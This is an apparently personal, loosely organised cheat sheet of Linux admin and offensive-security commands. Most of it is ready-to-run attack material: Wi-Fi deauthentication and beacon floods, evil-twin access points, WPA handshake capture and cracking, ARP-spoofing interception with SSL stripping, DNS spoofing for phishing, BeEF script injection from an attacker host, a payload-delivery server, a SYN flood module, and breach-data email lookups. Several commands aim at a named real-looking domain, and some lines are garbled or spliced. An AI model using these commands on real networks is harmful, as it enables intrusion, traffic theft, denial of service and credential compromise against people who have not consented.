------------------[Binary to Path]--------------------------
mkdir -p
nano /.bashrc #[if folder doesnt exist that create it]
export PATH="/bin:${PATH}"
export PATH="${HOME}/bin:${PATH}"
command -v binary
----------------------------------- [Sort Filesystem by size] ----------------------------------------
[where most size is stored] sudo du -hsx /* | sort -rh | head -n 40 sudo du -hsx /home/* | sort -rh | head -n 35
[enumerate storage on directory] sudo du -ah | sort -rh | head -n 30 du -m / | sort -rn | head -25
[remove unused packages] apt-get autoremove --purge
[check free disk space] sudo ncdu -x /
-------------------- [Clearing everything older than say 30 days]----------------------------
sudo journalctl --disk-usage sudo journalctl --vacuum-time=30d This example will keep 2GB worth of logs, clearing everything that exceeds this: sudo journalctl --vacuum-size=2G
----------------------------------- [Running Files] ----------------------------------------
systemctl list-units --all [Lists Running Modules] systemctl status --all [Lists Running Modules] lsmod [Activly Used # systemctl list-units --allDRiversr] dmesg [shows all device/driver activity] lsmod [shows active kernals etc]
----------------------------------------------------CONNECTING[HEADLESS]----------------------------------------- nmcli device wifi list
netdiscover -r sparrow wifi
nmcli device wifi connect "MyWiFiNetwork" password "wifiPassword"
ip address show
apt install network-manager-openvpn
netstat - [helps display network activity; (like TCP and UDP) are being used. and rouing. --- outputs mainly TCP]
netcat -all --> [scans for other protocols (udp and tcp)]
netlookup <host_name> --> reveals ip
route --> gives access to routing tables
netstat -rn [finds gatweay address]
ifrename # to rename wireless iwevent # display wireless events iwgetid # reports current essid iwlist # scan savailable aps or essid iwspy # monitors iw nodes and records strenght and quality of signal
nmcli general status sudo apt install ./discord.deb
nmcli general hostname # get and change sys hostname
nmcli general permissions # show the permssions available to caller
nmcli connection show --active sudo sniper -t https://dedicatedglass.com -m credentials
nmcli modify
nmap --trace out
nmcli networking on off # disable network control management
nmcli networking connectivity
nmcli radio all ## show status for all devices
nmcli radio wwan ## for tethered devices
nmcli radio wifi ## show status for wifi devices
nmcli device status
nmcli device showstatus
nmcli device showstatus wlan0
nmcli device wifi connect # connect to near hotspot
nmcli device wifi hotspot # create a wifi hotspot
sudo ifconfig wlan0 down
sudo airmon-ng check
sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo mdk3 wlan0 b -c 1 -f ./data/data.lst ## update data.txt with spooffed ap
airodump-ng wlan0 -c 11 ## use to monitor local APS max
--------------------------------------------------[WHOS CONNECTINIG TO ME]------------------------------------------
[Get devices and proximity to host] sudo iw dev wlx0013eff5483f scan | egrep "signal:|SSID:" | sed -e "s/\tsignal: //" -e "s/\tSSID: //" | awk '{ORS = (NR % 2 == 0)? "\n" : " "; print}' | sort
[arp-scanner -- returns IP AND MAC]
- sudo arp-scan --interface wlan0 -l
[angry ip scanner --- App, do not forget to configure settihngs ] [netdiscover]
- sudo netdiscover -i wlan0 -r
- sudo netdiscover -r
[KISMET] (browser based)
- sudo kismet -c wlan1mon
------------ [nmap to return mac address]------------ sudo nmap -sP -n airodump-ng wlx0013eff5483f -c 11 airodump-ng wlx0013eff5483f --encrypt wep sudo iwlist wlx0013eff5483f scanning | egrep 'Cell |Encryption|Quality|Last beacon|ESSID'
-------------------------------------[MITM- SNIFF SPECIFIC TARGET] -------------------------------------
net.show [shows whos connected to device]
net.probe on [probes packetsfor recon]
set arp.spoof.targets 19[ [sets spoof to victim]
set arp.spoof.fullduplex true [sets attack to victim and host]
set arp.spoof.targets address of the target Device)
arp.spoof on
set net.sniff.local true
net.sniff on [bettercap] - CLI [ettercap] - GUI
sudo bettercap -caplet http-ui [UI MODE]
bettercap -iface wlan0
[EtterCap - GUI]
- sudo ettercap -G
------------------------------------------ [Show / delete / spoof ARP cache] -----------------------------------------
- ip neigh show
- ip neigh flush all
- arpspoof -t
-----------------------------------------[Enumerate local SMB (SAMBA) Network]---------------------------------------
- sudo enum4linux localhost
---------------------------------------------[DISCOVER / DEAUTH USERS]---------------------------------------------
- sudo mdk4
[WASH: networks using the monitor mode interface-- such as printers]
- sudo wash -i wlan2 -c 6
[REAVER: the monitor mode interface (-i mon0) to attack the access point (-b E0:3F:49:6A:57:78), displaying verbose output (-v)]
- reaver -i wlan0mon -b E0:3F:49:6A:57:78 -v
[Use the aireplay to deauth users]
- aireplay-ng --deauth 0 -c [DEVICES MAC ADDRESS] -a [ROUTERS MAC ADDRESS] wlan0mon
- git clone https://github.com/bitbrute/evillimiter.git
- cd evillimiter
- sudo python3 setup.py install
- sudo evillimiter
- scan
- limit 1,2,3,4,5,6 200kbit ## LIMIT OR BLOCK NETWORK USERS
- block 3
- hosts
- free all
- git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
- cd airgeddon
- sudo bash airgeddon.sh
- sudo wifite -all
----------------------------------------- [BEACON FLOOD - DDOS] ---------------------------------
- sudo mdk4 wlan0 b "living room"
[airodump] - [shows devices (mac) within the station]
- airodump-ng wlan0
- airodump-ng -c11 -w airdump.txt -d 50:C7:BF:DC:4C:E8 wlan0
[wifi scan]
- sudo airodump-ng -w wider_scan_capture wlan0
- sudo airodump-ng -w ap_scan_capture wlan0 -d {AP MAC ADDRESS ^}
##--> RUN Deauth First, and concrunetly run capture handshake [mdk4 -- deauth]
- sudo mdk4 wlan0 d -E living room
- sudo aireplay-ng --deauth 0 -a wlan0
- sudo aireplay-ng -0 0 -a {AP MAC ADDRESS} -c wlan0
- sudo airodump-ng -w deauth_capture -c {channel^} -d {AP MAC} wlan0
- aircrack-ng deauth_capture.cap -w wordlist.txt
------------------------------------------[DEAUTH / THROTTLE] -------------------------------------------- [MORE INFO]
- [-0 means deauthentication.]
- [-0 =continous attack, 10=Quick reconncet]
- [-a Mac address of target AP]
- [-c macaddress associated client on ap to deauth(IF OMMITTED, ALL GET DEAUTHE
[deauth-- mdk4] deauth using mdk4
[Send deauth - ALL CLIENTS]
- [aireplay-ng] -0 0 -a 50:C7:BF:DC:4C:E8 -c wlan0
[Send deauth] -- SPECIFIC CLIENTS
- [aireplay-ng] -0 0 -a 50:C7:BF:DC:4C:E8 -c E0:B5:2D:EA:18:A7 wlan0
**********--> a .acap file should be downloaded --> load it into wireshark for analasys ************
- [aircrack-ng] xyz.cap -w wordlist.txt
-----------------------------------------------------[WIRESHARK - PSK SPY ]------------------------------------------
- First enter psk info into : https://www.wireshark.org/tools/wpa-psk.html (Gained from router pass and login)
-----------------------------------------------------[ PACKET-DUMP+ANALASYS ]------------------[tcpdump] -> captures traffic from all layeres of OSI MOdel. YOu can store and analyze the data, and analayze it later, on wireshark
-r = reverborse; places the captures in std_out --[TCP DUMP - persistant capture] -- $ sudo tcpdump -i eth0 -w capture_output.pcap -> Sniff traffic:
Useful tcpdump options: ▪ -i interface: Interface or any for all ▪ -n: Disable name and port resolution ▪ -A: Print in ASCII ▪ -XX: Print in hex and ASCII ▪ -w file: Write output PCA
- -r file: read PCAP --[Limited Capture]--
$ sudo tcpdump -i eth0 -C 100 -w limited_capture.pcap
[--NETCAT TCP LISTEN / CONNECT --] [Listen on TCP port]
- ncat -vnlp 2305 [Connect to TCP port]
- ncat -v 2305
--[Traffic from specific Victim] $ sudo tcpdump -i eth0 host 192.victims_ip -w host_traffic.pcap
--[airodump pcap] -- sudo airodump-ng wlan0mon -c 11 --bssid 61:32:victim_mac -w saved_pcap.pcap -o pcap -c = channel of station -----------------------------------------------------[LIMIT-BANDWIDTH]---------------------------------------- [netcut] -->A simple tool to ban people's Internet connection with ARP spoofing.
- https://github.com/cdes5804/NetCut Optionally, set a limit on the size of the capture file.
- net.prob on
- set arp.spoof.internal --> all computers will bespooofed
- set arp.spoof.targets ip_add, ip_add
- arp.spoof on
- set net.sniff.output ./pencap.pcap
- set net.sniff.verbose true
- net.sniff on
-----------------------------------------------------[BEEF-BETTERCAP-PROXY]---------------------------------------- --> SETS UP A ARP PROXY ON A TARGET BETWEEN HOST AND GATEWAY. [Launch BEEF]
- Beef-xss [Set Up Proxy]
- set http.proxy.injectjs http://attack_ip:3000/hook.js
- set https.proxy.injectjs https://attack_ip:3000/hook.js
- set https.proxy.sslstrip true
- set http.proxy.sslstrip true
- http.proxy on
- https.proxy on
- set arp.spoof.targets 192.victim_ip, 192.gateway_ip
- net.probe on
- arp.spoof on
- arp.spoof enable forwarding (std_out for results)
----------------------------------------------------[ARP-POISON+SSL_SRIP]--------------------------------------------- -->[ARP-Poison]
- ettercap -Tq -M arp:remote -i eth0 -S /192.gateway_ip// //192.victim_ip
[IP-TABLE RULES] -->> any tcp traffic coming to 80 to 8080; so we can we use the proxy and ssl strip
- iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080 m
- echo "1" > /proc/sys/net/ipv4/ip_forward
- mitmdump -s sslstrip.py -m transparent
----------------------------------------------------[DUMPING PKSID (WPA2) ]---------------------------------------------
[TCP DUMP]690339 tcpdump -s 0 port ftp or ssh -i eth0 -w mycap.pcap
----------------------------------------------------[tracking domain]---------------------------------------------
- ping [ping with both 'www' and naked domain
- nslookup [[ping with both 'www' and naked domain]
- use censys to find history between server, origin and destination.
- [https://github.com/censys/censys-python]
---------------------------------------[DNS and reverse DNS lookup]-----------------------------------------
- dig compass-security.com
- dig -x
----------------------------------------------[COPY WEBPAGE ] -------------------------------------------------]
- sudo apt install httrack webhttrack
- httprack -w domain.com
- tempmailer.de --> Use throw away email
----------------------------------------------[Windows Defender Payload] -----------------------------------]
[dsviper] enter info create python server to deliver payload
python3 -m http.server
python -m http.server 9999
ngrok http 9999
ssh -T [email protected] "sudo timeout 60 tcpdump -i wlan0 "not port 22 and not host localhost" -w - " > tcp_dump1.pcap [specifies not to use 'local host' or port 22'. time out is at 60 seconds
[arp-spoof] victim convisnced they are talking to server, but the spoof server is listening in the midle]
mitmweb [HAS NICE GUI]
[bettercap - GUI ]: sudo bettercap -caplet http-ui
net.probe on [shows whos on the network]
net.show [gives list of MAC and IP in graph]
set arp.spoof.targets [192.xxx]
arp.spoof on
net.sniff on [tells attacker what the victim is doing [inbound and out bound]
set dns.spoof.domains myebay.com [redirects to APACHE config]
set arp.spoof.targets [sets spoof to victim]
set arp.spoof.fullduplex true [sets attack to victim and host]
set arp.spoof.targets 192.victim_ip(IP address of the target Device)
arp.spoof on
Vset net.sniff.local true
net.sniff on
--------------------------------------------------- [ARP & SPOOF- Capture + REDIRECT TRAFFIC MITM] -------------------------------------- [bettercap] --->> This will capure all websies visited by the target.
- arp.spoof.targets 192.victim_ip
- arp.spooof enable forwarding
- net.sniff on ----------------[REDIRECT TRAFFIC] ---- (Phishing)
- net.sniff off
- dns.spoof myamazon.com -> 192.attacker_ip --------------------------------------------------- FIND IP FROM DOMAIN --------------------------------------
use ping, to see various hops. [will get firewalle] nslookup the hopped domain, will likely be a firewall like cloud flair. look for the last hop to cloud flair the difference between IP and domain wiill likely be the real IP your o looking for. tO cONFRIM, RUNN ;THE REAL ADDRESS through the results (DOMAINS) through NSLOOKUP, until an anomoly is found.
------------------------------------------------------[AP-SPOOFING]------------------------------------------------ [mdk4] +[airodump]
- sudo mdk3 wlx0013eff5483f b -c 1 -f ./data/data.lst ## update data.txt with spooffed ap
- airodump-ng wlx0013eff5483f -c 11 ## use to monitor local APS
-------------------------------------------------------QUICK& DIRTY NETWORK SCAN ---------------------------- function monitorWIFI() { sudo iwevent # display wireless events sudo iwlist # scan savailable aps or essid sudo iwspy # monitors iw nodes and records strenght and quality of signal sudo iwgetid # reports current essid } monitorWIFI
------------------------------------------------------ BASIC RECON ------------------------------------------------------
iwevent -- to get wireless events iwgetid - reports curretn essid / ap
hciconfig dev_name up sdptool browse MAC_ADDRESS
netstat - [helps d-oG” flag can be used to store the nmap result in to specific file.isplay network activity; (like TCP and UDP) are being used. and rouing. --- outputs mainly TCP] netcat -all --> [scans for other protocols (udp and tcp)]
netlookup <host_name> --> reveals ip route --> gives access to routing tables netstat -rn [finds gatweay address]
sudo netdiscover -i eth0 -r,/16,/8 [ [DISCOVER WHOS ON NETWORK]
dsniff - [practically snniffing for any password (FTP HTTP) WHILE ON NETWORK MDODE.] netcat [nc] --> [is a creepy, it can be used to follow you oce or persisant follwig you with a fwe commands. it can watch you upload/download or do anything on the networkthat hpersists)
airodump-ng wlx0013eff5483f --encrypt wep
------------------------------------------------------ WIFI-PESTER ------------------------------------------------------
- sudo airbase-ng --essid free_wifi -c 11 wlan1mon
- netdiscover -r
- aireplay-ng --deauth 90000000 -a F0:2F:74:2C:7E:88 -c 9a:26:55:ed:ef:84 wlo1
- besside-ng en0 -c 6 -b
- airodump-ng wlx0013eff5483f --encrypt wep
[make abunch of differnt APS]
- sudo mdk3 wlx0013eff5483f b -c 1 -f ./data/data.lst ## update data.txt with spooffed ap
- airodump-ng wlx0013eff5483f -c 11 ## use to monitor local APS
sudo nmap -p1-64580
service postgresql start
search synflood
use auxiliary/dos/tcp/synflood
show options
[DEAUTH USERS WHEN NOT ON ROUTER] git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git cd airgeddon sudo bash airgeddon.sh
--------------------------------------------------------[EVIL-TWIN || FAKE-AP & BRIDGED CONNECTION] -----------------------------------
- sudo airbase-ng --essid free_wifi -c 11 wlan1mon
[--- CREATE BRIDGE ---- ]
- sudo brctl addbr free_wifi_bridge
[--- CONNECT BRIDGE ---- ]
- sudo brctl addif free_wifi_bridge at0
- sudo brctl addif free_wifi_bridge eth0
- sudo ifconfig at0 up
[-----CREATE BRIDGE IP -----]
sudo ifconfig free_wifi_bridge up [configure so its within the subnet]
sudo ifconfig free_wifi_bridge up
sudo bash -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'
------------------------------------------------------ [BLUETOOTHNESS ------------------------------------------------------
---------------[BLUETOOTH MANAGER]--------------- [bluetoothctl] -h [bluetoothctl] scan on [btscanner] # launches GUI interface [bettercap]
ble.recon on ## returns the range and device name of enabled BT devices
- ble.recon off
- ble.show
hciconfig -h ## bluetooth context manager, similar to wifi manager (help menu)
man hciconfig
man hcitool
man sdptool ## allows queries on bluetooth servers --> permeessions / avail services
man btscanner
hciconfig dev_name up
sdptool browse MAC_ADDRESS
btscanner # launches GUI interface
------------------------------------------------------ FRONT-END ASSESSMENT / SCANNING 802.11 ------------------------------------------------------
[wig -- great preliminary scanner, returns good detials]
- wig url.html
[sniper] sudo sniper -u sudo sniper -t https://dedicatedglass.com -m credentials
-------------------------------------------- DNS OSNT ---------------------------------------------
[To FUZZ URL's for username]
- sherlock --nsfw -l username_target
[To quickly pull userfull server info]
- dig --help
- dig domain.com
- dig domain.com -t mx
- dig domain.com -t ns (dig domain.com AAAA # ipv6 addresses
proxychains firefox ike-scan dnstracer dedicatedglass.com Nslookup dedicatedglass.com (to get dns) Ping -a dedicatedglass.com tlssled 2 ⚙ sslscan -h dedicatedglass.com Recon-ng 2 ⚙ To grab SSL certificates sslyze --regular website or ip nslookup IP >> nslookup.txt http://geoiplookup.net/
host domain.com ## returns host IP and mailserver host -t ns domain.com host -t mx domain.com host ip_address # reverse dns
nslookup domain.com nslookup # to enter nslookup console
webserver
set type=ns domain.com
set type=mx domain.com
------------------------------------------------------ FRAMEWORK - [OTHER] 802.11 ------------------------------------------------------
(AUTOPWN - SCAN ROUTER FOR VULN) rsf (AutoPwn) > use scanners/autopwn rsf (AutoPwn) > show options rsf (AutoPwn) > set target rsf (AutoPwn) > run
(start armitage) sudo msfconsole sudo msfrpcd -P pass sudo msfrpcd -U msf -P pass --ssl sudo msfrpcd -U msf -P pass -a --ssl sudo armitage
------------------------------------------------------ [WEB-APP VULNS] ------------------------------------------------------
- Burp Suite
- Nikto
- Maltego
- SQLMap ---> [Automates manual SQL Injectiionns]
- Whatweb
whois lookup
#https://api.wigle.net/ #https://null-byte.wonderhowto.com/how-to/wardrive-android-phone-map-vulnerable-networks-0176136/
https://neatnik.net/steganographr/ --> stenography (*to hide tracks)
ls -al /usr/share/nmap/scripts/
------------------------------------------------------ FRAMEWORK - NMAP SCANNING 802.11 ------------------------------------------------------
[nMap] = CLI [zenmap] = GUI
[scripts] ls -al /usr/share/nmap/scripts/
--------------------------------------------------- [ OSINT ] -----------------------------------------------
############### SOCIAL MEDIA ###################### ######## OSNIT ###########
Pyhton3 sherlock.py username
cd /home/frank/the_harvester python3 theHarvester.py -d dedicatedglass.com -l 500 -b all
online OSNIT https://api.wigle.net/ https://www.nirsoft.net/ (look thins up, powerful tool) http://geoiplookup.net/ ### GEO IP LCOATIONS tracemyip.org inteltechniques.com
git clone 'https://github.com/Datalux/Osintgram' pip3 install -r requirements.txt echo 'ig_dummyacct' > username.conf echo 'ig_dummyPass' > pw.conf echo '{},' > settings.json python3 main.py ig_TARGET list # displays available commands
cd /home/frank/the_harvester python3 theHarvester.py -d dedicatedglass.com -l 500 -b all
pip3 install --upgrade -e git+https://github.com/twintproject/twint.git@origin/master#egg=twint git clone https://github.com/twintproject/twint.git cd twint pip3 install -r requirements.txt pip3 install twint
sudo twint -h twint --help sudo twint -g="34.0343535, -117.23414142,2km" --search 'fish shack' --email --phone ## find discussinon about a business sudo twint -u realdonaldtrump -g='34.39343535, -118.234234252,2km' sudo twint -u realdonaldtrump --search 'loser' -o trump.txt
git clone 'https://github.com/issamelferkh/userrecon' ./userrecon.sh
git clone 'https://github.com/sherlock-project/sherlock' cd sherlock python3 -m pip install -r requirements.txt python3 sherlock user123 python3 sherlock user1 user2 user3
git clone https://github.com/khast3x/h8mail.git apt-get install nodejs cd h8mail pip3 install -r requirements.txt python3 ./h8mail.py -h python3 h8mail.py -h python3 h8mail.py -t [email protected] -bc 'location_of_your_file/BreachCompilation' --local
theharvester -d priceline.com -l 1000 -b pgp nano targets.txt python3 h8mail.py -t '/root/h8mail/targets.txt' -bc '~/BreachCompilation' --local
* By default, Nmap version detection skips TCP port 9100 because some printers simply print anything sent to that port, leading to dozens of pages of HTTP GET requests, binary SSL session requests, etc. This behavior can be changed by modifying or removing the Exclude directive in nmap-service-probes, or you can specify --allports to scan all ports regardless of any Exclude directive.
-A = how aggressive you wannt the scan
--allports (Don't exclude any ports from version detection)
-p: Specifies which ports you want to scan. You can list individual ports separated by commas or use ranges separated by dashes.
-sS [SYN-Stealth Scan] = Initiates a SYN stealth scan, which is less likely to be logged.
-sV: [version detection] = Attempts to determine the version of the services running on open ports. -
-v: Increases verbosity, providing more information about the scan in progress.
-O = Operating System
- sS Attempts to determine the version of the services running on open ports.
--traceourt = target hosting service or identify additional targets according to our needs for quickly tracing the path.
-v : Increases verbosity, providing more information about the scan in progress.
-–script = Enables the use of various scripts from Nmap’s script database for more detailed discovery.
–script: Enables the use of various scripts from Nmap’s script database for more detailed discovery. --version-intensity (Set version scan intensity)
---------------------- [NMAP - Write to Output] ---------------------------
-oN [saves to a text file]
- scanOutput.txt <victim_ip>
-oX [saves to a XML file]
- nmap -oX scanOutputXML.xml <victim_ip>
-oG [saves in Greppable format]
- nmap -oG grep.txt <victim_ip>
-oA [Saves to all files]
- nmap -oA <victim_ip>
--------------- [NMAP - Probing Intensty ] sV --version-light (Enable light mode) sV --version-all (Try every single probe) sV --version-trace (Trace version scan activity)
[NMAP- Rate of packetes being sent]
-max-rate -host-timeout -min-rate [sends the packets no slower than spcefied number]
[NMAP - TIMING] -T0 = paranoid -T1 = Sneaky -T2 = Okay -T3-5 = Fvk this
[+] ssh -T [email protected] "sudo timeout 60 tcpdump -i wlan0 "not port 22 and not host localhost" -w - " > tcp_dump1.pcap
1.]-------------------------- [NMAP BASIC SCANS]------------------------------
NNAP Functions / Modality] 1. Port Discovery and Specificiation 2. Host Discovery and specifciatino 3. Vuln Scanning 4. Application and Service Detection 5. Software Verson Detection 6. Firewall / IDS SPoofing
2.] ------------------ [NMAP BASIC -- TYPES OF SCANS ] -------------------------
-1 -proxy [Run in targets with proxies] * nmap -proxies proxy 1 URL, proxy 2 URL
-iL [scan from file] * nmap -iL scan.txt
[-sS = TCP Syn port scan] * nmap 192.168.target -sS
[-sT = TCP connect port scan] * nmap <victim_ip> -sT
- nmap <victim_ip> -sA
[-sU = UDP Scan]
- nmap <victim_ip> -sU
[-Sf -- TCP FIN Scan]
- nmap -sF <victim_ip>
[-sX - XMAS Scan]
- nmap -sX <target_ip>
[-sP - Ping Scan]
- nmap -sP <victim_ip>
[-sU - UDP SCan]
- nmap -sU <victim_ip>
[-sA = TCP ACK scan(no port) ]
- nmap -Sa <victim_ip>
[3]------------------ [NMAP BASIC -- PORT SPECIFIC SCANS ] -------------------------
-P = Scan specefic ports (a. single or b. range)
- nmap -p 23 <victim_ip>
- nmap -p 23-100 <victim_ip>
[NMAP- different port scans / protocol: ie: Tcp 20-23 ; Udp 110
- nmap -pU:110, T:23-25,443, <victim_ip>
3.-p- = POrt scan for all ports
- nmap -p- <victim_ip>
[4]------------------ [NMAP BASIC -- HOST DISCOVERY ] -------------------------
-sL [NMAP- List subnet without scanning] *nmap <victim_ip> -sL
-sn [NMAP - Disble port scanning]
- nmap <victim_ip> -sn
-Pn [Port Scan Only-- NO HOST DISCOVERY]
- nmap <victim_ip> -Pn
-PS [ TCP-SYN Discovery oon Specific port]
- nmap <victim_ip> -PS22-25, 80
-PA [ TCP-ACK Discovery on specific port ]
- nmap <victim_ip> -PA20-25,80
-PU [UDP Discovery on a secfic port
- nmap <victim_ip> -PU53
-PR [ARP discovery within network]
- nmap <victim_ip>/8 -PR
-n [no dns resolution
- nmap <victim_ip> -n
[5] -------------------- [NMAP VERSION DETECTION] --------------------
-sV [find the version of the port the service is running on [VERSION-INTENSITY = 1-9)
- nmap <vctim_ip> -sV --version-intensity 9
-sV --version-all [Sets intensity to 9]
- nmap <victim_ip> -sV --version-all
-sV --version-light [Sets intensity to light]
- nmap <victim_ip> -sV --version-all
-O [Remote OS Detection]
- nmap <victim_ip> -O
[6] ----------------------------[NMAP FIREWALL EVASION] -------------------------------------------
-f [scan frament packets]\
- nmap -f <victim_ip>
-mtu [the largest packets scan will accept] * nmap -mtu [specify_mtu] <victim_ip>
-sI [scan idle zombie] - (This is accomplished by using packet spoofing to impersonate another computer so that the target believes it's being accessed by the zombie. The target will respond in different ways depending on whether the port is open, which can in turn be detected by querying the zombie) * nmap -sI [another_network_dev_ip] <victim_ip>
-data-length [size] - randomly append data *nmap -data-length [size] <victim_ip>
-nmap randomize-hosts [victim_ip]
--------------------------------------------------- [NMAP - PRACTICALITY] -----------------------------
[to find alll open ports]
- nmap -v www.geeksforgeeks.org
[to scan all open prts]
- nmap -p-
[to scan based on services (HTTP, FTP)]
- nmap -p http,https
[to scan multiple hosts]
- nmap
[To scan from FIle]
- nmap -iL input.txt
[Tstore the nmap result in to specific file. -oG” flag ]
- nmap -sS -oG
[UDP Port scan 'sU']
- nmap -sU
[ICMP Port scan 'sN']
- nmap -sn
[Perform a ping scan only]
- nmap -sP [target]
[TCP SYN Ping-->Initial HandShake]
- nmap -PS [target]
[TCP ACK PING---> Handshake back]
- nmap -PA [target]
[UDP PING] --> Streaming etc (no hanndshsake)
- nmap -PU [target]
[NMAP- Port Knocking] sudo nmap -sV -Pn -v ns8231.hostgator.com (#port knocking) Sudo nmap -A -Pn -v
nmap -sI -v google.com 2 ⚙ nmap -sW -v
[nmap to find who's on Lan] nmap -sn -v - A--version-intenstity=9
[nmap to return open ports and services -SV (specific device)-- PORT KNOCKING ] sudo nmap -sV -Pn -v ns8231.hostgator.com
Sudo nmap -A -Pn -v nmap -sI -v google.com 2 ⚙ nmap -sW -v
nmap -sn -v - A--version-intenstity=9
--------------------------------[NMAP- Identifiy FIREWALL]-----------------------------
[To scan to detect firewall settings.]
- sudo nmap -sA
[To detect who is on the LAN]
- nmap -sn -v - A--version-intenstity=9
[To Identify OS]
- nmap -O
[Identifiy Domain Names] [-oG] stores in a filepath [sS] is stealthy
- nmap -sS -oG
[Identify Hostnames]
- sudo nmap -sL
[To identify Hostnames] sudo nmap -sL
[Traceroute Domains - See firewalls?]
- nmap --trace out
-----------------------------[Example Scans]---------------------------------
[Disable port scanning. Host discovery only.]
- nmap -sn
[Never do DNS resolution]
- nmap -n
[ARP discovery on local network]
- nmap -PR
[Reverse DNS lookup of IP address range:]
- nmap -sL
--------------------------------------------------------[Service and Version Detection]--------------------------------------------
---------[Attempts to determine the version of the service running on port]
nmap -sV nmap -sV -version-intensity 8 [high likelyhood of false positive or firewall raised] nmap -sV -version-light [better outcome, longer time]
[Enables OS detection, version detection, script scanning, and traceroute] nmap -A
Target Specication
Switch Example Description nmap [Scan a single IP] nmap [Scan specic IPs] nmap [Scan a range] nmap scanme.nmap.org [Scan a domain] nmap [Scan using CIDR notation] -iL nmap -iL targets.txt Scan targets from a llist] -iR nmap -iR 100 Scan 100 random hosts
---------------------- [NMAP Scan Techniques] ----------------
[TCP SYN port scan (Default)] -sS nmap -sS [TCP connect port scan] -sT nmap -sT
(Default without root privilege) [UDP port scan] -sU nmap -sU [TCP ACK port scan] -sA nmap -sA [TCP Window port scan] -sW nmap -sW [TCP Maimon port scan] -sM nmap -sM
---------------[NMAP hOST DISCOVERY]---------------- -sL nmap -sL [No Scan. List targets only] -sn nmap -sn [Disable port scanning. Host discovery only.] -Pn nmap -Pn [Disable host discovery. Port scan ONLY] -PS nmap -PS22- 25,80 TCP SYN discovery on port x. Port 80 by default -PA nmap -PA22- 25,80 TCP ACK discovery on port x. Port 80 by default -PU nmap -PU53 UDP discovery on port x. Port 40125 by default
[ARP discovery on local network] -PR nmap -PR -n nmap -n Never do DNS resolution
------------------------[NMAP OS Detection] -----------------------
[Remote OS detection using TCP/IP stack ngerprinting] -O nmap -O [osscan-limit] -O --osscan-limit nmap -O --
[If at least one open and one closed TCP port are not found it will not try OS detection against host] -O --osscan-guess nmap -O --osscan-guess Makes Nmap guess more aggressively -O --max-os- tries nmap -O --max- os-tries 1 Set the maximum number x of OS detection tries against a target
[Enables OS detection, version detection, script scanning, and traceroute] nmap -A
------------------------[ NMAP INTRUSION DETECTION ] ---------------------------------
-T0 [Paranoid (0) Intrusion Detection System evasion] * nmap -T0 <victim_ip>
-T1 [-T1 Sneaky (1) Intrusion Detection System evasion] *-T1 nmap
-T2 [(tricky scan to avoid IDS) slows down the scan to use less bandwidth and use less target machine resources] * T2 nmap
-T3 [Normal (3) which is default speed] *T3 nmap
-T4 [Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network] * nmap -T4
-T5 [very aggressive (5) speeds scan; assumes you are on an extra] * nmap -T5
[------------------------ NMAP HOST DETECTION -------------------------]
[Remote OS detection using TCP/IP stack fingerprinting] nmap -O
[One open port One closed port = open machine] nmap -O -osscan-limit
[Aggrressive Nmap OS Scan] nmap -O -osscan-guess
nmap -sV -pN xx # basic nmap scan nmap -p local_ip_doman/24 -oG nmap_out.txt nmap 192.xxx -oX /dir/file.xml ## to output nmap to .xml nmap -A -Pn xxx/0/24 # os scan nmap -sA xxxx # tcp-ack scan --> unfilterd and filtered ports nmap -sI zombiehost.com domain.com nmap -sW xxx # window scan nmap -sV host,com -scrip dns-brute ## chain script
sudo nmap -sV -Pn -v dns.server.name (#port knocking) Sudo nmap -A -Pn -v nmap -sI -v google.com 2 ⚙ nmap -sW -v
[---------------- NMAPP - SCRIPTING (BASIC) ---------------------]-
**************NSE script with arguments ****************** ----> cd /usr/share/nmap/scripts
--script [exectute the listd scripts agsint victim ip] * nmap --script= test script victim_ip
-sV -sC = [use only safe default scripts for scan] * nmap -sV -sC
[Scan with default NSE] -scripts. Considered useful for discovery and safe nmap -sC
[Scan with default NSE]- scripts. Considered useful for discovery and safe nmap --script default
["not intrusive" Scan default, but remove intrusive scripts] *nmap --script "not intrusive"
[Scan with a single script. Example banner] *nmap --script=banner
[Scan with a wildcard] -- Example http nmap --script=http*
[SCAN with two scripts] --script nmap --script=http,banner
[NMAP Scan with arguments] nmap --script snmp-sysdescr --script-args snmpcommunity=admin
[---------------- NMAPP - VULN SCRIPTING (ADVANCED) ---------------------]-
--script [running two scripts against target] nmap --script=http,banner
[HTTP Site generator] --script=http-sitemap-generator =
- nmap -Pn --script=http-sitemap-generator scanme.nmap.org
[Fast search for random web servers]
- nmap -n -Pn -p 80 --open -sV -vvv --script=banner,http-title -iR 1000
[Brute forces DNS hostnames guessing subdomains]
- nmap -Pn --script=dns-brute domain.com
[Safe SMB]
* nmap -n -Pn -vv -O -sV --script smb-enum*,smb-ls,smb-mbenum,smb-os-discovery,smb-s*,smb-vuln*,smbv2* -vv
[whois query] * nmap --script whois* domain.com
[Detect cross site scripting vulnerabilities]
* nmap -p80 --script http-unsafe-output-escaping scanme.nmap.org
[Check for SQL injections]
* nmap -p80 --script http-sql-injection scanme.nmap.org
[NMAP - VULN SCRIPT-- INTENSE] nmap --script nmap-vulners/ -sV -sS -Pn -A -v --version-intensity=9 nmap -sV --script=vulscan/vulscan.nse nmap --script nmap-vulners/ -sV www.securitytrails.com nmap --script nmap-vulners/ -sV nmap --script nmap-vulners/,vulscan/ -sV yourwebsite.com nmap -Pn --script vuln nmap -iL probed.txt -T5 -oA scans/port_scan.txt -V sudo apt install ./discord.deb echo "scanning for open ports" nmap -iL probed.txt -T5 -oA scans/port_scan.txt -V
[NMAP scriptlocation]
cd /usr/share/nmap/scripts nmap --script nmap-vulners/ -sV -sS -Pn -A -v --version-intensity=9 nmap -sV --script=vulscan/vulscan.nse nmap --script nmap-vulners/ -sV www.securitytrails.com nmap --script nmap-vulners/ -sV nmap --script nmap-vulners/,vulscan/ -sV yourwebsite.com nmap -Pn --script vuln
nmap -sV --script=http-php-version testphp.vulnweb.com
nmap -oX /home/frank/nmapout.xml nmap cpanel.dedicatedglass.com/24 -oX /home/frank/nmap.xml
